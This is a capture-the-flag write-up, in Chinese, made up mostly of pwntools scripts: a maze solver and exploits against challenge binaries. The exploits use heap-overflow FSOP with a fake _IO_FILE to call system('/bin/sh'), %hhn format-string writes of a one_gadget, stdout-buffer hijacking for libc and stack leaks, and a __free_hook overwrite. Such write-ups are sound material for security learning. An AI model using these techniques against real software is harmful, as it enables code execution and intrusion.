冲塔失败,三亚之旅要看i春秋前面ban几个了,附件
Misc
babymaze1
1 | #coding=utf-8 |
2 | from pwn import* |
3 | import numpy as np |
4 | #context.log_level = 'DEBUG' |
5 | def Get_T(s): |
6 | line = [] |
7 | tmp = [] |
8 | j = 0 |
9 | k = 0 |
10 | start = [] |
11 | end = [] |
12 | data = '' |
13 | for i in range(s): |
14 | data += p.recvline() |
15 | data = data.replace('\x23','\x00') # black |
16 | data = data.replace('\x20','\x01') # white |
17 | data = data.replace('\x24','\x03') # flag |
18 | data = data.replace('\x2A','\x02') |
19 | for i in data: |
20 | if(i == '\n'): |
21 | line.append(tmp) |
22 | tmp = [] |
23 | j += 1 |
24 | k = 0 |
25 | elif(i == '\x02'): |
26 | start.append(j) |
27 | start.append(k) |
28 | k += 1 |
29 | tmp.append(ord(i)) |
30 | elif(i == '\x03'): |
31 | end.append(j) |
32 | end.append(k) |
33 | k += 1 |
34 | tmp.append(ord(i)) |
35 | else: |
36 | k += 1 |
37 | tmp.append(ord(i)) |
38 | return line,start,end |
39 | ############################### |
40 | def up(location): |
41 | # 到达了数组顶端 |
42 | if location[0] == 0: |
43 | return False |
44 | else: |
45 | new_location = [location[0] - 1, location[1]] |
46 | |
47 | # 走过的路不再走 |
48 | if new_location in history_path: |
49 | return False |
50 | # 遇到墙不走 |
51 | elif maze[new_location[0]][new_location[1]] == 0: |
52 | return False |
53 | else: |
54 | lookup_path.append(new_location) |
55 | history_path.append(new_location) |
56 | return True |
57 | |
58 | |
59 | def down(location): |
60 | # 遇到迷宫最下方的时候,不能继续往下走 |
61 | if location[0] == len(maze) - 1: |
62 | return False |
63 | else: |
64 | new_location = [location[0] + 1, location[1]] |
65 | # 走过的路不再走 |
66 | if new_location in history_path: |
67 | return False |
68 | # 遇到墙不走 |
69 | elif maze[new_location[0]][new_location[1]] == 0: |
70 | return False |
71 | else: |
72 | history_path.append(new_location) |
73 | lookup_path.append(new_location) |
74 | return True |
75 | |
76 | |
77 | def left(location): |
78 | # 遇到迷宫最左边,不能继续往左走 |
79 | if location[1] == 0: |
80 | return False |
81 | else: |
82 | new_location = [location[0], location[1] - 1] |
83 | # 走过的路不再走 |
84 | if new_location in history_path: |
85 | return False |
86 | # 遇到墙不走 |
87 | elif maze[new_location[0]][new_location[1]] == 0: |
88 | return False |
89 | else: |
90 | history_path.append(new_location) |
91 | lookup_path.append(new_location) |
92 | return True |
93 | |
94 | |
95 | def right(location): |
96 | # 遇到迷宫最右边,不能继续向右移动 |
97 | if location[1] == len(maze[0]) - 1: |
98 | return False |
99 | else: |
100 | new_location = [location[0], location[1] + 1] |
101 | # 走过的路不再走 |
102 | if new_location in history_path: |
103 | return False |
104 | # 遇到墙不走 |
105 | elif maze[new_location[0]][new_location[1]] == 0: |
106 | return False |
107 | else: |
108 | history_path.append(new_location) |
109 | lookup_path.append(new_location) |
110 | return True |
111 | def get_line(path): |
112 | p = '' |
113 | for i in range(len(path)-1): |
114 | tmp1 = path[i] |
115 | tmp2 = path[i + 1] |
116 | if tmp1[0] > tmp2[0]: |
117 | p += 'w' |
118 | elif tmp1[0] < tmp2[0]: |
119 | p += 's' |
120 | if tmp1[1] > tmp2[1]: |
121 | p += 'a' |
122 | elif tmp1[1] < tmp2[1]: |
123 | p += 'd' |
124 | return p |
125 | |
126 | |
127 | p = remote('182.92.203.154',11001) |
128 | p.sendlineafter('Please press any key to start.','FMYY') |
129 | |
130 | for i in range(5): |
131 | log.info('LEVEL' + str(i+1)) |
132 | maze,start,end = Get_T(11 + i*10) |
133 | lookup_path = [] |
134 | history_path = [] |
135 | lookup_path.append(start) |
136 | history_path.append(start) |
137 | while lookup_path[-1] != end: |
138 | now = lookup_path[-1] |
139 | if up(now) or down(now) or left(now) or right(now): |
140 | continue |
141 | lookup_path.pop() |
142 | #print("Final:", lookup_path) |
143 | path = get_line(lookup_path) |
144 | #log.info('PATH:\t' + path) |
145 | p.sendlineafter('> ',path) |
146 | p.recvuntil('your win\n') |
147 | |
148 | p.interactive() |
Pwn
wind_farm_panel
1 | from pwn import* |
2 | def menu(ch): |
3 | p.sendlineafter('>> ',str(ch)) |
4 | def new(index,size,content): |
5 | menu(1) |
6 | p.sendlineafter(': ',str(index)) |
7 | p.sendlineafter('turbine: ',str(size)) |
8 | p.sendafter('name: ',content) |
9 | def show(index): |
10 | menu(2) |
11 | p.sendlineafter('viewed: ',str(index)) |
12 | def edit(index,content): |
13 | menu(3) |
14 | p.sendlineafter('turbine: ',str(index)) |
15 | p.sendafter('input: ',content) |
16 | p = process('./main') |
17 | p = remote('182.92.203.154',28452) |
18 | libc =ELF('./libc-2.23.so') |
19 | new(0,0x200,'\x00'*0x208 + p32(0xDF1)) |
20 | new(1,0x1000,'FMYY') |
21 | new(2,0x100,'\xA0') |
22 | show(2) |
23 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x70 - 0x620 |
24 | log.info('LIBC:\t' + hex(libc_base)) |
25 | |
26 | IO_list_all = libc_base + libc.sym['_IO_list_all'] |
27 | IO_str_jumps = libc_base + 0x3C37A0 |
28 | fake_IO_FILE = p64(0) + p64(0x61) |
29 | fake_IO_FILE += p64(0) + p64(IO_list_all - 0x10) |
30 | fake_IO_FILE += p64(0) + p64(1) |
31 | fake_IO_FILE += p64(0) + p64(libc_base + libc.search('/bin/sh').next()) |
32 | fake_IO_FILE = fake_IO_FILE.ljust(0xD8,'\x00') |
33 | fake_IO_FILE += p64(IO_str_jumps - 8) |
34 | fake_IO_FILE += p64(0) + p64(libc_base + libc.sym['system']) |
35 | new(3,0x200,'\x00'*0x200 + fake_IO_FILE) |
36 | menu(1) |
37 | p.sendline('4') |
38 | p.sendline(str(0x200)) |
39 | p.interactive() |
shell
1 | from pwn import* |
2 | context.log_level = 'DEBUG' |
3 | p = process('./main') |
4 | p = remote('182.92.203.154',35264) |
5 | libc =ELF('./libc-2.23.so') |
6 | p.sendline('fg %12$p') |
7 | p.recvuntil('0x') |
8 | proc_base = int(p.recv(12),16) - 0x203169 |
9 | log.info('Proc:\t' + hex(proc_base)) |
10 | |
11 | |
12 | |
13 | payload = 'fg %174$s' |
14 | payload = payload.ljust(0x10,'U') |
15 | payload += p64(proc_base + 0x2030B8) |
16 | p.sendline(payload) |
17 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['getopt'] |
18 | log.info('LIBC:\t' + hex(libc_base)) |
19 | |
20 | |
21 | payload = 'fg %' + str((libc_base + 0x45226)&0xFF) + 'c%174$hhn' |
22 | payload = payload.ljust(0x10,'U') |
23 | payload += p64(proc_base + 0x2030C8) |
24 | p.sendline(payload ) |
25 | |
26 | sleep(0.2) |
27 | payload = 'fg %' + str(((libc_base + 0x45226)>>8)&0xFF) + 'c%174$hhn' |
28 | payload = payload.ljust(0x10,'U') |
29 | payload += p64(proc_base + 0x2030C8 + 1) |
30 | p.sendline(payload ) |
31 | |
32 | sleep(0.2) |
33 | payload = 'fg %' + str(((libc_base + 0x45226)>>16)&0xFF) + 'c%174$hhn' |
34 | payload = payload.ljust(0x10,'U') |
35 | payload += p64(proc_base + 0x2030C8 + 2) |
36 | p.sendline(payload) |
37 | |
38 | sleep(0.2) |
39 | payload = 'fg %' + str(((libc_base + 0x45226)>>24)&0xFF) + 'c%174$hhn' |
40 | payload = payload.ljust(0x10,'U') |
41 | payload += p64(proc_base + 0x2030C8 + 3) |
42 | p.sendline(payload) |
43 | |
44 | sleep(0.2) |
45 | payload = 'fg %' + str(((libc_base + 0x45226)>>32)&0xFF) + 'c%174$hhn' |
46 | payload = payload.ljust(0x10,'U') |
47 | payload += p64(proc_base + 0x2030C8 + 4) |
48 | p.sendline(payload) |
49 | |
50 | sleep(0.2) |
51 | payload = 'fg %' + str(((libc_base + 0x45226)>>40)&0xFF) + 'c%174$hhn' |
52 | payload = payload.ljust(0x10,'U') |
53 | payload += p64(proc_base + 0x2030C8 + 5) |
54 | p.sendline(payload) |
55 | p.sendline('quit') |
56 | p.interactive() |
Power_System [After Game]
第一次知道strncmp依旧不是按照n来比较的,还是会\0截断
爆破脚本
1 | # coding=utf-8 |
2 | from pwn import* |
3 | from Crypto.Util.number import * |
4 | import string |
5 | import hashlib |
6 | import random |
7 | s = '%p%p%pLC:%p' |
8 | def passwd(): |
9 | def F(code): |
10 | hashresult=hashlib.sha256(s + code).digest().encode('hex').upper() |
11 | return hashresult.startswith('E85000') |
12 | |
13 | prefix = util.iters.mbruteforce(F, string.ascii_letters + string.digits, 4, 'fixed') |
14 | return prefix |
15 | print passwd() |
exp1
思路来自havik师傅,劫持stdout的缓冲区到bss,让缓冲区的字节修改0x7008位置的指针,实现任意写
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('>> ',str(ch)) |
5 | def adjust(index,size,content): |
6 | menu(2) |
7 | p.sendlineafter('the power: ',str(index)) |
8 | p.sendlineafter('size: ',str(size)) |
9 | p.sendafter('staff: ',content) |
10 | def delete(index): |
11 | menu(3) |
12 | p.sendlineafter('power: ',str(index)) |
13 | def login(): |
14 | menu(2) |
15 | p.sendlineafter('account :','QAQ') |
16 | p.sendafter('password :','rCLQ\n') |
17 | p = process('./main') |
18 | p = remote('182.92.203.154',15268) |
19 | libc =ELF('./libc-2.29.so') |
20 | login() |
21 | adjust(-6,0,'\x00'*0x17 + '\n') |
22 | p.sendline('2') |
23 | p.sendline('-2') |
24 | p.sendline('0') |
25 | p.sendline('\x00'*0xD8 + p64(0xFBAD1800)) |
26 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_'] - 0xD00 |
27 | log.info('LIBC:\t' + hex(libc_base)) |
28 | environ = libc_base + libc.sym['environ'] |
29 | system = libc_base + libc.sym['system'] |
30 | IO_stdout_off = libc_base + libc.sym['_IO_2_1_stdout_'] + 131 |
31 | adjust(-6,0,'\x00'*0x18 + p64(environ) + p64(environ + 8) + p64(environ + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1) + '\n') |
32 | p.sendline('2') |
33 | p.sendline('-2') |
34 | p.sendline('0') |
35 | p.sendline('\x00'*0xD8 + p64(0xFBAD1800)) |
36 | |
37 | stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) |
38 | log.info('Stack:\t' + hex(stack)) |
39 | leak_address = stack - 0x160 |
40 | adjust(-6,0,'\x00'*0x18 + p64(leak_address) + p64(leak_address + 8) + p64(leak_address + 8) + p64(IO_stdout_off) + p64(IO_stdout_off + 1) + '\n') |
41 | p.sendline('2') |
42 | p.sendline('-2') |
43 | p.sendline('0') |
44 | p.sendline('\x00'*0xD8 + p64(0xFBAD1800)) |
45 | |
46 | proc_base = u64(p.recv(6).ljust(8,'\x00')) - 0x7040 |
47 | log.info('Proc:\t' + hex(proc_base)) |
48 | |
49 | leak_address = proc_base + 0x7000 |
50 | adjust(-6,0,p64(leak_address)*6 + p64(leak_address + 2) + p64(leak_address + 9)+ '\n') |
51 | p.sendline('2') |
52 | p.sendline('-2') |
53 | p.sendline('0') |
54 | p.sendline('\x00'*0xD8 + p64(0xFBAD1800)) |
55 | |
56 | IO_overflow = libc_base + libc.sym['_IO_file_jumps'] + 0x18 |
57 | adjust(-13,0,p64(1) + p64(IO_overflow - 8) + '\n') |
58 | adjust(1,0,p64(libc_base + 0x106EF8) + '\n') |
59 | p.interactive() |
exp2
走题目所给后门,2.24下的fsop 会调用free_buffer指针,而2.29改为调用free函数
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('>> ',str(ch)) |
5 | def adjust(index,size,content): |
6 | menu(2) |
7 | p.sendlineafter('the power: ',str(index)) |
8 | p.sendlineafter('size: ',str(size)) |
9 | p.sendafter('staff: ',content) |
10 | def delete(index): |
11 | menu(3) |
12 | p.sendlineafter('power: ',str(index)) |
13 | def login(): |
14 | menu(2) |
15 | p.sendlineafter('account :','QAQ') |
16 | p.sendafter('password :','%p%p%pLC:%pbMUK\n') |
17 | p = process('./main') |
18 | #p = remote('182.92.203.154',15268) |
19 | libc =ELF('./libc-2.29.so') |
20 | login() |
21 | p.recvuntil('LC:') |
22 | libc_base = int(p.recv(14),16) - 0x1EC540 |
23 | log.info('LIBC:\t' + hex(libc_base)) |
24 | |
25 | system = libc_base + libc.sym['system'] |
26 | |
27 | IO_list_all = libc_base + libc.sym['_IO_list_all'] |
28 | IO_str_jumps = libc_base + 0x1E6620 |
29 | fake_IO_FILE = '\x00'*0x18 |
30 | fake_IO_FILE += p64(0) + p64(1) |
31 | fake_IO_FILE += p64(0) + p64(libc_base + libc.search('/bin/sh').next()) |
32 | fake_IO_FILE = fake_IO_FILE.ljust(0xD0,'\x00') |
33 | fake_IO_FILE += p64(IO_str_jumps - 8) + p64(0xFBAD2887) |
34 | |
35 | |
36 | adjust(-2,0,fake_IO_FILE) |
37 | p.sendline('FMYY') |
38 | menu(4) |
39 | p.sendlineafter('__free_hook',p64(system)) |
40 | p.interactive() |